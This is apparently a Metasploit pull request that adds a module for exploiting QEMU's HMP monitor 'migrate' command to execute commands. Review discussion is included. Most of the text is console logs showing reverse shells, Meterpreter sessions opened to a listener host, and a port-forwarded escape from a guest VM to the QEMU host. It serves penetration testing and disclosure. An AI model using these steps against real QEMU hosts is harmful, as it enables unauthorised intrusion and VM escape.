Add QEMU Monitor HMP 'migrate' Command Execution module
rapid7/metasploit-framework pull request #16151
Opened 2022-02-06 18:18 UTC by bcoles

## Vulnerable Application

This module uses QEMU's Monitor Human Monitor Interface (HMP)
TCP server to execute system commands using the `migrate` command.

This module has been tested successfully on QEMU version 6.2.0
on Ubuntu 20.04.

Note: The `migrate` command cannot spawn processes for QEMU
running on Windows systems.

## Installation Steps

Download and install [QEMU](https://www.qemu.org/download/).

## Verification Steps

Start QEMU and monitor HMP service using TCP:

```
qemu-system-aarch64 -M virt -monitor tcp:0.0.0.0:4444,server,nowait -serial mon:stdio -nographic
```

1. `msfconsole`
1. `use exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec`
1. `set rhosts [host]`
1. `set rport [port]`
1. `set target [target]`
1. `run`
1. You should get a session

## Options

## Scenarios

### Unix Command Target

```
msf6 > use exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec
[*] Using configured payload cmd/unix/reverse
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set rhosts 172.16.191.240
rhosts => 172.16.191.240
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set rport 4444
rport => 4444
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set lhost 172.16.191.192
lhost => 172.16.191.192
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > run
[*] Started reverse TCP double handler on 172.16.191.192:4444 
[*] 172.16.191.240:4444 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.16.191.240:4444 - The target appears to be vulnerable. QEMU monitor HMP service is running.
[*] 172.16.191.240:4444 - Sending payload (128 bytes) ...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RDx8lJn8owvPaWYr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\nRDx8lJn8owvPaWYr\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.240:41054 ) at 2022-02-05 23:30:49 -0500
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1002(wireshark)
```

### Linux Dropper Target

```
msf6 > use exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec
[*] Using configured payload cmd/unix/reverse
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set rhosts 172.16.191.240
rhosts => 172.16.191.240
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set rport 4444
rport => 4444
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set target 2
target => 2
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set target "Linux (Dropper)" 
target => Linux (Dropper)
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set lhost 172.16.191.192 
lhost => 172.16.191.192
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.240:4444 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.16.191.240:4444 - The target appears to be vulnerable. QEMU monitor HMP service is running.
[*] 172.16.191.240:4444 - Sending payload (178 bytes) ...
[*] Sending stage (989032 bytes) to 172.16.191.240
[*] 172.16.191.240:4444 - Command Stager progress - 100.00% done (849/849 bytes)
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.240:41050 ) at 2022-02-05 23:24:56 -0500
meterpreter > getuid
Server username: user
meterpreter > 
```

### QEMU Breakout

The HMP TCP service is reachable from emulated devices, even when the service is
bound to the local network interface only (ie, `-monitor tcp:127.0.0.1:4444`), as
all network traffic from the emulated network adapter is routed via the QEMU host.

As such, it is possible to escape QEMU from a session within an emulated device
(10.0.2.15) and gain a session on the QEMU host (10.0.2.2).

```
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer     : debian-9-13-0-mipsel.local
OS           : Debian 11.2 (Linux 5.10.0-10-4kc-malta)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > ipconfig 
Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface  2
============
Name         : enp0s11
Hardware MAC : 52:54:00:12:34:56
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5054:ff:fe12:3456
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fec0::5054:ff:fe12:3456
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > portfwd add -l 1234 -p 4444 -r 10.0.2.2
[*] Local TCP relay created: :1234 <-> 10.0.2.2:4444
meterpreter >
Background session 1? [y/N]
msf6 exploit(multi/handler) > use exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec
[*] Using configured payload cmd/unix/reverse
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set rport 1234
rport => 1234
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > check
[*] 127.0.0.1:1234 - The target appears to be vulnerable. QEMU monitor HMP service is running.
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > set lhost 172.16.191.192
lhost => 172.16.191.192
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > run
[*] Started reverse TCP double handler on 172.16.191.192:4444 
[*] 127.0.0.1:1234 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:1234 - The target appears to be vulnerable. QEMU monitor HMP service is running.
[*] 127.0.0.1:1234 - Sending payload (128 bytes) ...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Rl19l7hvy8EO5hPz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Rl19l7hvy8EO5hPz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.192:4444 -> 172.16.191.240:41056 ) at 2022-02-06 12:54:42 -0500
uname -a
Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```

2022-02-06 18:19 UTC, bcoles commented on modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb
> +        'DisclosureDate' => '2011-12-02'
I spent ages trying to find the dates that the HMP service was added and supported TCP, and the date the migrate command was added. In the end I gave up and used the date of QEMU 1.0 release.

2022-02-07 16:59 UTC, smcintyre-r7 requested changes
I left just a couple of notes. I was able to test this on Fedora, and both targets work great. It's pretty neat that this can also be used as an escape. Nice work.

2022-02-07 16:59 UTC, smcintyre-r7 commented on modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb
> +              'DefaultOptions' => {
Since there aren't any `ARCH_CMD` payloads for the Linux platform, this isn't a problem today but strictly speaking, this should have the architectures defined for it.

```suggestion
              'Platform' => 'linux',
              'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => {
```

If there was a Linux-specific ARCH_CMD payload added in the future, this change would prevent it from being marked as compatible with this module and breaking.

2022-02-07 16:59 UTC, smcintyre-r7 commented on modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb
> +    end
Can avoid the unnecessary recursion here. Since it's from a socket reading data we don't control, the possibility a stack overflow is slightly concerning.

```suggestion
    ::Timeout.timeout(10) do
      loop do
        res = sock.get_once
        break if res.nil?
        break if res.to_s.include?('(qemu)')
      end
    end
```

2022-02-07 17:48 UTC, bcoles commented on modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb
> +    end
fixed

2022-02-07 17:48 UTC, bcoles commented on modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb
> +              'DefaultOptions' => {
fixed

2022-02-07 21:42 UTC, smcintyre-r7 approved these changes
Everything looks good to me now. I retested both targets and they're working as intended. I'll have this landed in a minute.

```
msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > show options 

Module options (exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    4444             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (Dropper)


msf6 exploit(multi/misc/qemu_monitor_hmp_migrate_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] 192.168.159.128:4444 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.159.128:4444 - The target appears to be vulnerable. QEMU monitor HMP service is running.
[*] 192.168.159.128:4444 - Sending payload (178 bytes) ...
[*] Sending stage (989032 bytes) to 192.168.159.128
[*] 192.168.159.128:4444 - Command Stager progress - 100.00% done (849/849 bytes)
[*] Meterpreter session 3 opened (192.168.159.128:5555 -> 192.168.159.128:57862 ) at 2022-02-07 16:41:17 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 34 (Linux 5.15.18-100.fc34.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

2022-02-07 21:44 UTC, merged

2022-02-07 21:45 UTC, smcintyre-r7 commented
# Release Notes
This adds a module that can exploit the QEMU HMP service to execute OS commands. Because the HMP TCP service is reachable from emulated devices, it is also possible to escape QEMU by exploiting this vulnerability.